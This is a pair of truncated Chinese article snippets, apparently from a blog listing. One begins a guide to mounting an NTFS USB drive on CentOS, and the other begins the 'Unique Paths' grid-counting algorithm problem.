在CentOS上挂载NTFS格式的U盘,需要执行一系列步骤,包括识别U盘设备、安装必要的软件、创建挂载点,并最终挂载U盘。以下是在CentOS上挂载NTFS格式U盘的详细步骤: 一、准备工作 确认CentOS版本: 确保你的CentOS系统已经安装并正常运行。不同版本的CentOS在命令和工具方面可能…

不同路径

不同路径 一个机器人位于一个 m x n 网格的左上角 &#xff08;起始点在下图中标记为 “Start” &#xff09;。 机器人每次只能向下或者向右移动一步。机器人试图达到网格的右下角&#xff08;在下图中标记为 “Finish” &#xff09;。 问总共有多少条不同的路径&#xff…